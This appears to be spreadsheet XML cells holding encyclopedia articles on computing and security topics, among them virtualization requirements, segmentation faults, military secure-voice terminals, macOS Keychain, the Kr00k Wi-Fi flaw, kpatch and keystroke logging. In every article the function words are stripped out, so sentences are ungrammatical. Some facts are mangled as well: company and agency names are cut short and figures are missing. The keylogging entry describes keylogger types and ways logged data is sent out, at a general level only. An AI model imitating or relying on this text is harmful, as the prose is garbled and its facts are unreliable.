    <t>popek goldberg virtualization requirements conditions sufficient computer architecture support system virtualization efficiently. they introduced gerald popek robert goldberg 1974 article "formal requirements virtualizable third generation architectures". even though requirements derived simplifying assumptions, still represent convenient determining whether computer architecture supports efficient virtualization provide guidelines design virtualized computer architectures. definition system virtual machines capable virtualizing full hardware resources, including processor processors), memory storage resources peripheral devices. virtual machine monitor (vmm, also called hypervisor) piece software provides abstraction virtual machine. there three properties interest analyzing environment created vmm: equivalence fidelity program running exhibit behavior essentially identical demonstrated running equivalent machine directly. resource control safety must complete control virtualized resources. efficiency performance statistically dominant fraction machine instructions must executed without intervention.in terminology popek goldberg, must present three properties. terminology used reference book smith nair (2005), vmms typically assumed satisfy equivalence resource control properties, additionally meeting performance property called efficient vmms.popek goldberg describe characteristics instruction architecture (isa) physical machine must possess order vmms possess properties. their analysis derives characteristics using model "third generation architectures" (e.g., 360, honeywell 6000, pdp-10) nevertheless general enough extended modern machines. this model includes processor operates either system user mode, access linear, uniformly addressable memory. assumed subset instruction available system mode memory addressed relative relocation register. interrupts modelled. virtualization theorems derive virtualization theorems, give sufficient (but necessary) conditions virtualization, popek goldberg introduce classification instructions different groups: privileged instructions those trap processor user mode trap system mode (supervisor mode). control sensitive instructions those attempt change configuration resources system. behavior sensitive instructions those whose behavior result depends configuration resources (the content relocation register processor's mode).the main result popek goldberg's analysis expressed follows. theorem conventional third-generation computer, effective constructed sensitive instructions computer subset privileged instructions. intuitively, theorem states build sufficient instructions could affect correct functioning (sensitive instructions) always trap pass control vmm. this guarantees resource control property. non-privileged instructions must instead executed natively (i.e., efficiently). holding equivalence property also follows. this theorem also provides simple technique implementing vmm, called trap-and-emulate virtualization, recently called classic virtualization: sensitive instructions behave nicely, trap emulate every time them.a related problem deriving sufficient conditions recursive virtualization, conditions copy built. popek goldberg present following (sufficient) conditions. theorem conventional third-generation computer recursively virtualizable virtualizable without timing dependencies constructed it.some architectures, like non-hardware-assisted x86, meet conditions, cannot virtualized classic way. architectures still fully virtualized case meaning level) using different techniques like binary translation, replaces sensitive instructions generate traps, sometimes called critical instructions. this additional processing however makes less efficient theory, hardware traps non-negligible performance cost well. well-tuned caching binary translation system achieve comparable performance, case binary translation relative first generation hardware assist, merely made sensitive instructions trappable. effectively gives theorem different sufficiency conditions.theorem hybrid constructed third generation machine user sensitive instructions subset privileged instructions: handling critical instructions conditions virtualization expressed theorem relaxed expense efficiency property. vmms non-virtualizable isas popek goldberg's sense) routinely built. virtualization architectures requires correct handling critical instructions, i.e., sensitive unprivileged instructions. approach, known patching, adopts techniques commonly used dynamic recompilation: critical instructions discovered run-time replaced trap vmm. various mechanisms, caching emulation code hardware assists, proposed make patching process efficient. different approach paravirtualization, requires guest operating systems modified (ported) running virtual environment. instruction sets common architectures this section presents relevant architectures relate virtualization requirements. pdp-10 pdp-10 architecture instructions sensitive (alter query processor's mode) privileged. these instructions save restore condition codes containing user bits: jsr: jump subroutine jsp: jump save program counter pushj: push jump jrst: jump restore system/370 sensitive instructions system/370 privileged: satisfies virtualization requirements. motorola mc68000 motorola mc68000 single unprivileged sensitive instruction: move srthis instruction sensitive allows access entire status register, includes condition codes also user/supervisor bit, interrupt level, trace control. later family members, starting mc68010, move instruction made privileged, move instruction provided allow access condition code register only. ia-32 (x86) ia-32 instruction pentium processor contains sensitive, unprivileged instructions. they categorized groups: sensitive register instructions: read change sensitive registers memory locations clock register interrupt registers: sgdt, sidt, sldt smsw pushf, popf protection system instructions: reference storage protection system, memory address relocation system: lar, lsl, verr, verw push call far, far, retf (segment registers)the introduction amd-v intel vt-x instruction sets 2005 allows processors meet popek goldberg virtualization requirements. ia-64 effort needed support virtualization ia-64 architecture described 2000 article magenheimer christian. sparc "hyperprivileged" mode ultrasparc architecture specified ultrasparc architecture 2005.' defines sun4v platform super-set sun4u platform, still compliant sparc level-1 specification. powerpc sensitive instructions powerpc instruction privileged. performance practice efficiency requirement popek goldberg's definition concerns execution non-privileged instructions, must execute natively. this distinguishes general class hardware emulation software. unfortunately, even architecture meets popek goldberg's requirements, performance virtual machine differ significantly actual hardware. early experiments performed system/370 (which meets formal requirements theorem showed performance virtual machine could native machine benchmarks. cost trapping emulating privileged instructions significant. this engineers introduce number hardware assists, roughly doubled performance system/370 virtual machines. assists added several stages. end, assists late models system/370.one main driving factors development hardware assists system/370 virtual memory itself. when guest operating system implemented virtual memory, even non-privileged instructions could experience longer execution times penalty imposed requirement access translation tables used native execution (see shadow page tables). references notes</t>
  </si>
  <si>
    <t>Protocol-based intrusion detection system</t>
  </si>
  <si>
    <t>protocol-based intrusion detection system (pids) intrusion detection system typically installed server, used monitoring analysis protocol computing system. pids monitor dynamic behavior state protocol typically consist system agent would typically front server, monitoring analyzing communication connected device system protecting. typical pids would front server monitoring http https) stream. because understands http relative server/system trying protect offer greater protection less in-depth techniques filtering address port number alone, however greater protection comes cost increased computing server. where https system would need reside "shim" interface https un-encrypted immediately prior entering presentation layer. monitoring dynamic behavior basic level pids would look for, enforce, correct protocol. advanced level pids learn taught acceptable constructs protocol, thus better detect anomalous behavior. also application protocol-based intrusion detection system (apids) host-based intrusion detection system (hids) intrusion detection system (ids) network intrusion detection system (nids) tripwire (software) pioneering hids trusted computing group trusted platform module</t>
  </si>
  <si>
    <t>Segmentation fault</t>
  </si>
  <si>
    <t>computing, segmentation fault (often shortened segfault) access violation fault, failure condition, raised hardware memory protection, notifying operating system (os) software attempted access restricted area memory memory access violation). standard computers, form general protection fault. operating system kernel will, response, usually perform corrective action, generally passing fault offending process sending process signal. processes cases install custom signal handler, allowing recover own, otherwise default signal handler used, generally causing abnormal termination process program crash), sometimes core dump. segmentation faults common class error programs written languages like provide low-level memory access safety checks. they arise primarily errors pointers virtual memory addressing, particularly illegal access. another type memory access error error, also various causes, today much rarer; occur primarily incorrect physical memory addressing, misaligned memory access memory references hardware cannot address, rather references process allowed address. many programming languages employ mechanisms designed avoid segmentation faults improve memory safety. example, rust programming language employs ownership-based model ensure memory safety. other languages, lisp java, employ garbage collection, avoids certain classes memory errors could lead segmentation faults. overview segmentation fault occurs program attempts access memory location allowed access, attempts access memory location allowed (for example, attempting write read-only location, overwrite part operating system). term "segmentation" various uses computing; context "segmentation fault", term used since 1950s, refers address space program. with memory protection, program's address space readable, this, stack read/write portion data segment program writable, read-only data code segment writable. thus attempting read outside program's address space, writing read-only segment address space, results segmentation fault, hence name. systems using hardware memory segmentation provide virtual memory, segmentation fault occurs hardware detects attempt refer non-existent segment, refer location outside bounds segment, refer location fashion allowed permissions granted segment. systems using paging, invalid page fault generally leads segmentation fault, segmentation faults page faults faults raised virtual memory management system. segmentation faults also occur independently page faults: illegal access valid page segmentation fault, invalid page fault, segmentation faults occur middle page (hence page fault), example buffer overflow stays within page illegally overwrites memory. hardware level, fault initially raised memory management unit (mmu) illegal access referenced memory exists), part memory protection feature, invalid page fault referenced memory exist). problem invalid logical address instead invalid physical address, error raised instead, though always distinguished. operating system level, fault caught signal passed offending process, activating process's handler signal. different operating systems different signal names indicate segmentation fault occurred. unix-like operating systems, signal called sigsegv (abbreviated segmentation violation) sent offending process. microsoft windows, offending process receives status_access_violation exception. causes conditions segmentation violations occur manifest specific hardware operating system: different hardware raises different faults given conditions, different operating systems convert different signals passed processes. proximate cause memory access violation, underlying cause generally software sort. determining root cause debugging simple cases, program consistently cause segmentation fault (e.g., dereferencing null pointer), cases difficult reproduce depend memory allocation (e.g., dereferencing dangling pointer). following typical causes segmentation fault: attempting access nonexistent memory address (outside process's address space) attempting access memory program rights (such kernel structures process context) attempting write read-only memory (such code segment)these turn often caused programming errors result invalid memory access: dereferencing null pointer, usually points address that's part process's address space dereferencing assigning uninitialized pointer (wild pointer, points random memory address) dereferencing assigning freed pointer (dangling pointer, points memory freed/deallocated/deleted) buffer overflow stack overflow attempting execute program compile correctly. (some compilers output executable file despite presence compile-time errors.)in code, segmentation faults often occur errors pointer use, particularly dynamic memory allocation. dereferencing null pointer, results undefined behavior, usually cause segmentation fault. this null pointer cannot valid memory address. hand, wild pointers dangling pointers point memory exist, readable writable, thus result transient bugs. example: dereferencing variables could cause segmentation fault: dereferencing null pointer generally cause segfault, reading wild pointer instead result random data segfault, reading dangling pointer result valid data while, random data overwritten. handling default action segmentation fault error abnormal termination process triggered core file generated debugging, platform-dependent actions also performed. example, linux systems using grsecurity patch sigsegv signals order monitor possible intrusion attempts using buffer overflows. systems, like linux windows, possible program handle segmentation fault. depending architecture operating system, running program handle event extract information state like getting stack trace, processor register values, line source code triggered, memory address invalidly accessed whether action read write.although segmentation fault generally means program needs fixing, also possible intentionally cause failure purposes testing, debugging also emulate platforms direct access memory needed. latter case, system must able allow program even fault occurs. case, system allows, possible handle event increment processor program counter "jump" failing instruction continue execution. examples writing read-only memory writing read-only memory raises segmentation fault. level code errors, occurs program writes part code segment read-only portion data segment, loaded read-only memory. here example ansi code generally cause segmentation fault platforms memory protection. attempts modify string literal, undefined behavior according ansi standard. most compilers catch compile time, instead compile executable code crash: when program containing code compiled, string "hello world" placed rodata section program executable file: read-only section data segment. when loaded, operating system places strings constant data read-only segment memory. when executed, variable, point string's location, attempt made write character variable memory, causing segmentation fault. compiling program compiler check assignment read-only locations compile time, running unix-like operating system produces following runtime error: backtrace core file gdb: this code corrected using array instead character pointer, allocates memory stack initializes value string literal: even though string literals modified (this undefined behavior standard), static char type, implicit conversion original code (which points char array), static const char type, thus implicit conversion, compilers generally catch particular error. null pointer dereference c-like languages, null pointers used mean "pointer object" error indicator, dereferencing null pointer read write null pointer) common program error. standard null pointer pointer memory address though case practice. most operating systems null pointer's address accessing causes segmentation fault. this behavior guaranteed standard. dereferencing null pointer undefined behavior conforming implementation allowed assume pointer dereferenced null. this sample code creates null pointer, tries access value (read value). doing causes segmentation fault runtime many operating systems. dereferencing null pointer assigning (writing value non-existent target) also usually causes segmentation fault: following code includes null pointer dereference, compiled often result segmentation fault, value unused thus dereference often optimized away dead code elimination: buffer overflow following code accesses character array beyond upper boundary. depending compiler processor, result segmentation fault. stack overflow another example recursion without base case: causes stack overflow results segmentation fault. infinite recursion necessarily result stack overflow depending language, optimizations performed compiler exact structure code. case, behavior unreachable code (the return statement) undefined, compiler eliminate tail call optimization might result stack usage. other optimizations could include translating recursion iteration, given structure example function would result program running forever, probably overflowing stack. also general protection fault storage violation guru meditation references external links process: focus boundary segmentation fault faq: user contributed answers regarding definition segmentation fault "null pointer" explained answer null guaranteed null pointer not? open group base specifications issue signal.h</t>
  </si>
  <si>
    <t>Security Descriptor Definition Language</t>
  </si>
  <si>
    <t>security descriptor definition language (sddl) defines string format used describe security descriptor text string. also security descriptor references external links understanding sddl syntax wayback machine (archived march 2016) read sddl string wayback machine (archived august 2015)</t>
  </si>
  <si>
    <t>KY-68</t>
  </si>
  <si>
    <t>tsec/ky-68 dsvt, commonly known digital subscriber voice terminal, military ruggedized, full- half-duplex tactical telephone system built-in encryption/decryption module secure traffic. transmits voice data kbit/s, converting voice digital signal. ky-68 operate civilian military switches either encrypted un-encrypted mode, point-to-point (encrypted mode only). although used primarily secure communications, ky-68 also transmit digital non-secure voice terminal (dnvt). local switch warns ky-68 user tone signal initiating communication non-secure terminal. ky-68 keyed using electronic transfer device, typically either kyk-13 an/cyz-10. almost identical office version (ky-78) features electronics ky-68, exterior casing composed lighter materials. ky-68 ky-78 approved secret-classified information. also ky-57 ky-58 external links jerry proc's page ky-68 signal leader's guide field manual 11-43</t>
  </si>
  <si>
    <t>Keychain (software)</t>
  </si>
  <si>
    <t>keychain password management system macos, developed apple. introduced 8.6, included subsequent versions operating system, known macos. keychain contain various types data: passwords (for websites, servers, accounts, network shares, wireless networks, groupware applications, encrypted disk images), private keys, certificates, secure notes. storage access macos, keychain files stored ~/library/keychains/ (and subdirectories), /library/keychains/, /network/library/keychains/, keychain access application located utilities folder applications folder. free, open source software released terms apsl-2.0. command line equivalent keychain access /usr/bin/security. keychain database encrypted per-table per-row aes-256-gcm. time credential decrypted, long remain decrypted, whether encrypted credential synced icloud varies depending type data stored, documented apple support website. locking unlocking default keychain file login keychain, typically unlocked login user's login password, although password keychain instead different user's login password, adding security expense convenience. keychain access application permit setting empty password keychain. keychain automatically "locked" computer idle time, locked manually keychain access application. when locked, password re-entered next time keychain accessed, unlock overwriting file ~/library/keychains/ (e.g. part restore operation) also causes keychain lock password required next access. password synchronization login keychain protected login password, keychain's password changed whenever login password changed within logged session macos. shared mac/non-mac network, possible login keychain's password lose synchronization user's login password changed non-mac system. also, password changed directory service like active directory open directory, password changed another admin account e.g. using system preferences. some network administrators react deleting keychain file logout, created next time user logs this means keychain passwords remembered session next, even login password changed. happens, user restore keychain file ~/library/keychains/ backup, lock keychain need unlocked next use. history keychains initially developed apple's e-mail system, powertalk, early 1990s. among many features, powertalk used plug-ins allowed mail retrieved wide variety mail servers online services. keychain concept naturally "fell out" code, used powertalk manage user's various login credentials various e-mail systems powertalk could connect passwords easily retrievable encryption, simplicity interface allowed user select different password every system without fear forgetting them, single password would open file return all. time, implementations concept available platforms. keychain parts powertalk obviously useful own", suggested promoted become part basic internal politics, kept inside powertalk system and, therefore, available users.it return steve jobs 1997 keychain concept revived now-discontinued powertalk. point time concept longer unusual, still rare keychain system associated particular piece application software, typically browser. keychain later made standard part included first commercial versions. security keychain distributed macos. version simpler applications mobile devices typically need basic keychain features. example, features acls (access control lists) sharing keychain items different apps present. thus, keychain items accessible created them. users’ default storage sensitive information, keychain prime target security attacks. 2019, 18-year-old german security researcher linus henze demonstrated hack, dubbed keysteal, grabs passwords keychain. initially withheld details hack, demanding apple bounty macos. apple however done henze subsequently revealed hack. utilized safari's access security services, disguised utility macos enables administrators manipulate keychains. also list password managers password manager cryptography references</t>
  </si>
  <si>
    <t>Kr00k</t>
  </si>
  <si>
    <t>kr00k (also written krøøk) security vulnerability allows wpa2 encrypted wifi traffic decrypted. vulnerability originally discovered security company eset 2019 assigned cve-2019-15126 august 2019. eset estimates vulnerability affects billion devices. discovery named kr00k robert lipovsky stefan svorencik. discovered trying variations krack attack.initially found chips made broadcom cypress, similar vulnerabilities found implementations, including qualcomm mediatek. patches vulnerability known patched 13.2 ipados 13.2 october 2019 macos catalina 10.15.1, security update 2019-001, security update 2019-006 october 2019 vulnerable devices during research, eset confirmed dozen popular devices vulnerable.cisco found several devices vulnerable working patches. they tracking issue advisory cisco-sa-20200226-wi-fi-info-disclosure.known vulnerable devices include: amazon echo amazon kindle apple ipad mini apple iphone apple macbook retina 13-inch 2018 asus wireless routers (rt-ac1200g+, rt-ac68u), fixed firmware version 3.0.0.4.382.5161220 march 2020 google nexus google nexus google nexus raspberry samsung galaxy (gt-i9505) samsung galaxy xiaomi redmi references</t>
  </si>
  <si>
    <t>Kpatch</t>
  </si>
  <si>
    <t>kpatch feature linux kernel implements live patching running kernel, allows kernel patches applied kernel still running. avoiding need rebooting system kernel contains desired patches, kpatch aims maximize system uptime availability. time, kpatch allows kernel-related security updates applied without deferring scheduled downtimes. internally, kpatch allows entire functions running kernel replaced patched versions, safely stopping running processes live patching performed.kpatch developed hat, source code licensed terms general public license version (gplv2). 2014, kpatch submitted inclusion linux kernel mainline, minimalistic foundations live patching merged linux kernel mainline kernel version 4.0, released april 2015. internals internally, kpatch consists parts core kernel module executes live patching mechanism altering kernel's inner workings, userspace utilities prepares individual patch kernel modules source diffs manages application. live kernel patching performed function level, meaning kpatch replace entire functions running kernel patched versions using facilities provided ftrace "route around" versions functions; way, patches also easily undone. changes kernel's internal data structures possible; however, security patches, natural candidates used kpatch, rarely contain changes kernel's data structures.kpatch ensures patches applied atomically safely stopping running processes patch applied, ensuring none stopped processes running inside functions patched. such approach simplifies whole live patching mechanism prevents certain issues associated data structures used original patched versions functions. downside, approach also leaves possibility patch fail, introduces small amount latency required stopping running processes. history announced publicly released kpatch february 2014 terms general public license version (gplv2), shortly suse released live kernel patching implementation called kgraft. kpatch merged linux kernel mainline, submitted inclusion 2014.kpatch included enterprise linux 7.0, released june 2014, technology preview.minimalistic foundations live kernel patching merged linux kernel mainline kernel version 4.0, released april 2015. those foundations, based primarily kernel's ftrace functionality, form common core capable supporting patching kpatch kgraft, providing application programming interface (api) kernel modules contain patches application binary interface (abi) userspace management utilities. however, common core included linux kernel supports architecture provide mechanisms ensuring function-level consistency patches applied.since april 2015, ongoing work porting kpatch common live patching core provided linux kernel mainline. however, implementation required function-level consistency mechanisms delayed call stacks provided linux kernel unreliable situations involve assembly code without proper stack frames; result, porting work remains progress september 2015. attempt improve reliability kernel's call stacks, specialized sanity-check stacktool userspace utility also developed. also dynamic software updating, field research focusing upgrading programs running kexec, method loading whole linux kernel running system ksplice kernelcare, linux kernel live patching technologies developed ksplice, inc. (later acquired oracle) cloudlinux, respectively references external links kpatch source code github</t>
  </si>
  <si>
    <t>KY-58</t>
  </si>
  <si>
    <t>vinson ky-58 secure voice module primarily used encrypt radio communication military aircraft tactical vehicles. employed u.s. military joint services, nato enforcement agencies. designed operate bandwidth-restricted circuits satellite access wideband switched telephone systems. uses kbit/s continuously variable slope delta modulation (cvsd). system initially fielded replacement kg-36 kg-34. unit fits five-inch cube weighs pounds. production ended 1993. also ky-57 ky-68 references external links ky-58 (vinson) jerry proc interactive ky-58 graphics explaining controls</t>
  </si>
  <si>
    <t>Keyfile</t>
  </si>
  <si>
    <t>keyfile key-file) file computer contains encryption license keys. common server software running secure socket layer (ssl) protocols. server-specific keys issued trusted authorities merged keyfile along trusted root certificates. method keys updated without recompiling software rebooting server. keyfile often part public infrastructure (pki). some applications keyfile hold licensing information, periodically reviewed ensure currency compliance. other applications allow users merge multiple service-specific security settings single common store (for example, apple computer's keychain later versions, gnome keyring kwallet gnome environments linux, respectively). also license manager list license managers passphrase encryption software product activation digital rights management .key extension keynote (apple presentation software)</t>
  </si>
  <si>
    <t>Keystream</t>
  </si>
  <si>
    <t>cryptography, keystream stream random pseudorandom characters combined plaintext message produce encrypted message (the ciphertext). "characters" keystream bits, bytes, numbers actual characters like depending usage case. usually character keystream either added, subtracted xored character plaintext produce ciphertext, using modular arithmetic. keystreams used one-time cipher stream ciphers. block ciphers also used produce keystreams. instance, mode block mode makes block cipher produce keystream thus turns block cipher stream cipher. example simple example english alphabet characters a-z. thus encrypt numbers, commas, spaces symbols. random numbers keystream least encrypt keystream numbers plaintext. decrypt subtract keystream numbers ciphertext plaintext. ciphertext number becomes larger wrap value 0-25. thus becomes becomes (such wrapping called modular arithmetic.) here plaintext message "attack dawn" combined addition keystream "kjcngmlhylyu" produces ciphertext "kcvniwlabluh". references handbook applied cryptography menezes, oorschot vanstone (2001), chapter</t>
  </si>
  <si>
    <t>Kopano (software)</t>
  </si>
  <si>
    <t>kopano discontinued open-source groupware application suite originally based zarafa. initial version kopano core (kc) forked then-current release (the open-source parts zarafa collaboration platform, superseded terms lineage switched maintenance mode patches flowing kopano webapp similarly descended zarafa webapp. since october 2017, kopano core also known specifically kopano groupware core, since kopano b.v. developed products directly requiring groupware components. original goal replacement microsoft exchange, users could retain outlook client application. while kopano's business strategy shifted towards providing comprehensive office collaboration suite right, kopano core supports connections outlook clients either z-push/activesync, last windows mapi plugin zarafa.the kopano outlook extension add-in outlook provides outlook functionality activesync alone support. this includes (for example) support office public folders. activesync kopano outlook extension together therefore able fully integrate kopano backend within outlook corporate environment. webapp plugins exist perform advanced group tasks accessing cloud based storage solutions (e.g. owncloud nextcloud), integrated video conference (webmeetings) handling s/mime email within webapp. desktop application, deskapp, also available. this look feel webapp integrates directly user's desktop available windows, linux mac. server-side components (kopano core) webapp published affero general public license (agpl). technology microsoft outlook, well kopano/zarafa clients, uses mapi source code level. so-called mapi providers (essentially plugins) abstract take care underlying transport mechanism. kopano-server exposes functionality stream sockets uses http protocol, data serialized using soap/xml. commands sent data specific kopano/zarafa. conversely, kopano mapi provider implements protocol client side. these http connections secured tls/ssl proxied desired. because exchange instead uses mapi/rpc wire, stock outlook connector exchange could used traditionally required windows version zarafa mapi provider product proprietary unsupported since 2016–04). outlook versions 2013 2016 support activesync, protocol also used many mobile clients, using z-push software server side, activesync requests translated clients effectively talk kopano server well. kopano core generally stores data mysql-compatible database. attachments saved filesystem, amazon database used place chunked blobs. server user information ldap/active directory, unix user accounts mysql database. additional gateways imap, pop3 icalendar/caldav protocols provided. kopano webapp (and deskapp equivalent stand-alone application) full-featured applications include support mail, calendars, group calendars, public folders many functionalities. webapp integrated many plugins added installation. kopano provides several plugins files (cloud storage access within webapp), webmeetings (video conference) s/mime (which allows reading sending encrypted email). developer can, however, write additional plugins using webapp plugin api. edition kopano available freely downloadable community edition. community edition gives users access main branch builds includes latest code overnight builds. kopano community edition includes advanced premium features webmeetings (video conferencing), kopano files (cloud storage access) s/mime plugin (which allows sending receiving encrypted email). kopano also available paid-for product official kopano tested releases provided supported directly kopano. kopano briefly available linux distributions. package e.g. debian last update 2020/q1, opensuse removed 2021/q1 following build failures contemporary toolchains. version history also list collaborative software references external links official website</t>
  </si>
  <si>
    <t>Sensor drive</t>
  </si>
  <si>
    <t>hw.sensors framework kernel-level hardware sensors framework originating openbsd, uses sysctl kernel interface transport layer kernel userland. 2019, framework used hundred device drivers openbsd export various environmental sensors, temperature sensors common type. consumption monitoring sensors done userland help sysctl, systat, sensorsd, ntpd, snmpd, ports/sysutils/symon gkrellm. drivers openbsd, framework integrated dell's esm, ipmi i2c, addition number popular super chips lm(4).a major difference compared solutions like lm_sensors simplicity works-by-default approach drivers, require support configurability; installation configuration actions required system administrator order sensors going. this coupled fine-tuned ad-hoc read-only scan procedure bus, written theo raadt centralised cache, making possible leave enabled default times, unlike competing solutions. raid drive sensors support automatic monitoring raid drives also provided sensors framework, concept sensors drive type backported netbsd back envsys 2007. openntpd timedelta sensors openntpd uses sensors type timedelta order synchronise time. these provided nmea drivers. history framework originally devised 2003 alexander yurchenko, porting several envsys-based drivers netbsd. instead porting netbsd's envsys, simpler sysctl-based mechanism developed.the framework received major uptick usage device drivers release openbsd 3.9, period merely months, number individual drivers using framework went openbsd (released november 2005) openbsd (released 2006).as december 2006, framework used devices drivers; time patchset committed converting simple one-level addressing scheme stable multi-layer addressing.in 2007, framework ported freebsd part google summer code grant; adopted dragonfly later year. usability sensorsd(8), sensors monitoring daemon, vastly improved 2007, partly gsoc grant.as november 2008, total number drivers stood openbsd 4.4; growing drivers 6-month release cycle. this level growth, driver month average, common throughout history framework since openbsd 3.9.the values exported drivers framework read-only; however, external patch exists implements control functionality framework well drivers popular family super chips; patchset provided openbsd dragonfly bsd. also lm_sensors speedfan references external links cvsweb.openbsd.org/cgi-bin/cvsweb/src/sys/sys/sensors.h asiabsdcon2009-sensors-paper.pdf asiabsdcon2009-sensors-slides.pdf</t>
  </si>
  <si>
    <t>Sensorsd</t>
  </si>
  <si>
    <t>Keystroke logging</t>
  </si>
  <si>
    <t>keystroke logging, often referred keylogging keyboard capturing, action recording (logging) keys struck keyboard, typically covertly, person using keyboard unaware actions monitored. data retrieved person operating logging program. keystroke recorder keylogger either software hardware. while programs legal, many designed allow employers oversee computers, keyloggers often used stealing passwords confidential information.keylogging also used study keystroke dynamics human-computer interaction. numerous keylogging methods exist, ranging hardware software-based approaches acoustic cryptanalysis. application keylogger software-based keyloggers software-based keylogger computer program designed record input keyboard. keyloggers used organizations troubleshoot technical problems computers business networks. families businesspeople keyloggers legally monitor network usage without users' direct knowledge. microsoft publicly stated windows built-in keylogger final version improve typing writing services". however, malicious individuals keyloggers public computers steal passwords credit card information. most keyloggers stopped https encryption protects data transit computers; software-based keyloggers affected user's computer, reading keyboard inputs directly user types. from technical perspective, several categories: hypervisor-based: keylogger theoretically reside malware hypervisor running underneath operating system, thus remains untouched. effectively becomes virtual machine. blue pill conceptual example. kernel-based: program machine obtains root access hide intercepts keystrokes pass kernel. this method difficult write combat. such keyloggers reside kernel level, makes difficult detect, especially user-mode applications root access. they frequently implemented rootkits subvert operating system kernel gain unauthorized access hardware. this makes powerful. keylogger using method keyboard device driver, example, thus gain access information typed keyboard goes operating system. api-based: these keyloggers hook keyboard apis inside running application. keylogger registers keystroke events normal piece application instead malware. keylogger receives event time user presses releases key. keylogger simply records windows apis getasynckeystate(), getforegroundwindow(), etc. used poll state keyboard subscribe keyboard events. recent example simply polls bios pre-boot authentication pins cleared memory. form grabbing based: form grabbing-based keyloggers form submissions recording form data submit events. this happens user completes form submits usually clicking button pressing enter. this type keylogger records form data passed internet. javascript-based: malicious script injected targeted page, listens events onkeyup(). scripts injected variety methods, including cross-site scripting, man-in-the-browser, man-in-the-middle, compromise remote website. memory-injection-based: memory injection (mitb)-based keyloggers perform logging function altering memory tables associated browser system functions. patching memory tables injecting directly memory, technique used malware authors bypass windows (user account control). zeus spyeye trojans method exclusively. non-windows systems protection mechanisms allow access locally recorded data remote location. remote communication achieved methods used: data uploaded website, database server. data periodically emailed pre-defined email address. data wirelessly transmitted employing attached hardware system. software enables remote login local machine internet local network, data logs stored target machine. keystroke logging writing process research since 2006, keystroke logging established research method study writing processes. different programs developed collect online process data writing activities, including inputlog, scriptlog, translog ggxlog. keystroke logging used legitimately suitable research instrument several writing contexts. these include studies cognitive writing processes, include descriptions writing strategies; writing development children (with without writing difficulties), spelling, first second language writing, specialist skill areas translation subtitling.keystroke logging used research writing, specifically. also integrated educational domains second language learning, programming skills, typing skills. related features software keyloggers augmented features capture user information without relying keyboard presses sole input. some features include: clipboard logging. anything copied clipboard captured program. screen logging. screenshots taken capture graphics-based information. applications screen logging abilities take screenshots whole screen, application, even around mouse cursor. they take screenshots periodically response user behaviors (for example, user clicks mouse). screen logging used capture data inputted on-screen keyboard. programmatically capturing text control. microsoft windows allows programs request text 'value' controls. this means passwords captured, even hidden behind password masks (usually asterisks). recording every program/folder/window opened including screenshot every website visited. recording search engines queries, instant messenger conversations, downloads internet-based activities (including bandwidth used). hardware-based keyloggers hardware-based keyloggers depend upon software installed exist hardware level computer system. firmware-based: bios-level firmware handles keyboard events modified record events processed. physical and/or root-level access required machine, software loaded bios needs created specific hardware running keyboard hardware: hardware keyloggers used keystroke logging utilizing hardware circuit attached somewhere computer keyboard computer, typically inline keyboard's cable connector. there also connector-based hardware keyloggers, well ones laptop computers (the mini-pci card plugs expansion slot laptop). more stealthy implementations installed built standard keyboards device visible external cable. both types keyboard activity internal memory, subsequently accessed, example, typing secret sequence. hardware keyloggers require software installed target user's computer, therefore interfering computer's operation less likely detected software running however, physical presence detected example, installed outside case inline device computer keyboard. some implementations controlled monitored remotely using wireless communication standard. wireless keyboard mouse sniffers: these passive sniffers collect packets data transferred wireless keyboard receiver. encryption used secure wireless communications devices, need cracked beforehand transmissions read. cases, enables attacker type arbitrary commands victim's computer. keyboard overlays: criminals known keyboard overlays atms capture people's pins. each keypress registered keyboard well criminal's keypad placed device designed look like integrated part machine bank customers unaware presence. acoustic keyloggers: acoustic cryptanalysis used monitor sound created someone typing computer. each keyboard makes subtly different acoustic signature struck. possible identify keystroke signature relates keyboard character statistical methods frequency analysis. repetition frequency similar acoustic keystroke signatures, timings different keyboard strokes context information probable language user writing used analysis sounds letters. fairly long recording (1000 keystrokes) required large enough sample collected. electromagnetic emissions: possible capture electromagnetic emissions wired keyboard metres away, without physically wired 2009, swiss researchers tested different usb, ps/2 laptop keyboards semi-anechoic chamber found vulnerable, primarily prohibitive cost adding shielding manufacture. researchers used wide-band receiver tune specific frequency emissions radiated keyboards. optical surveillance: optical surveillance, keylogger classical sense, nonetheless approach used capture passwords pins. strategically placed camera, hidden surveillance camera atm, allow criminal watch password entered. physical evidence: keypad used enter security code, keys actual evidence many fingerprints. passcode four digits, four digits question known, reduced 10,000 possibilities possibilities (104 versus [factorial 4]). these could used separate occasions manual "brute force attack". smartphone sensors: researchers demonstrated possible capture keystrokes nearby computer keyboards using commodity accelerometer found smartphones. attack made possible placing smartphone near keyboard desk. smartphone's accelerometer detect vibrations created typing keyboard translate accelerometer signal readable sentences much percent accuracy. technique involves working probability detecting pairs keystrokes, rather individual keys. models "keyboard events" pairs works whether pair keys pressed left right side keyboard whether close together apart qwerty keyboard. once worked out, compares results preloaded dictionary word broken way. similar techniques also shown effective capturing keystrokes touchscreen keyboards cases, combination gyroscope ambient-light sensor. body keyloggers: body keyloggers track analyze body movements determine keys pressed. attacker needs familiar keys layout tracked keyboard correlate body movements keys position. tracking audible signals user' interface (e.g. sound device produce informs user keystroke logged) reduce complexity body keylogging algorithms, marks moment pressed. history mid-1970s, soviet union developed deployed hardware keylogger targeting typewriters. termed "selectric bug", measured movements print head selectric typewriters subtle influences regional magnetic field caused rotation movements print head. early keylogger written perry kivolowitz posted usenet newsgroup net.unix-wizards, net.sources november 1983. posting seems motivating factor restricting access /dev/kmem unix systems. user-mode program operated locating dumping character lists (clients) assembled unix kernel. 1970s, spies installed keystroke loggers embassy consulate buildings moscow. they installed bugs selectric selectric electric typewriters.soviet embassies used manual typewriters, rather electric typewriters, classified information—apparently immune bugs. 2013, russian special services still typewriters. cracking writing simple software applications keylogging trivial, like nefarious computer program, distributed trojan horse part virus. what trivial attacker, however, installing covert keystroke logger without getting caught downloading data logged without traced. attacker manually connects host machine download logged keystrokes risks traced. trojan sends keylogged data fixed e-mail address address risks exposing attacker. trojans researchers adam young moti yung discussed several methods sending keystroke logging. they presented deniable password snatching attack keystroke logging trojan installed using virus worm. attacker caught virus worm claim victim. cryptotrojan asymmetrically encrypts pilfered login/password pairs using public trojan author covertly broadcasts resulting ciphertext. they mentioned ciphertext steganographically encoded posted public bulletin board usenet. police 2000, used flashcrest ispy obtain passphrase nicodemo scarfo, jr., boss nicodemo scarfo. also 2000, lured suspected russian cybercriminals elaborate ruse, captured usernames passwords keylogger covertly installed machine used access computers russia. used credentials gain access suspects' computers russia obtain evidence prosecute them. countermeasures effectiveness countermeasures varies 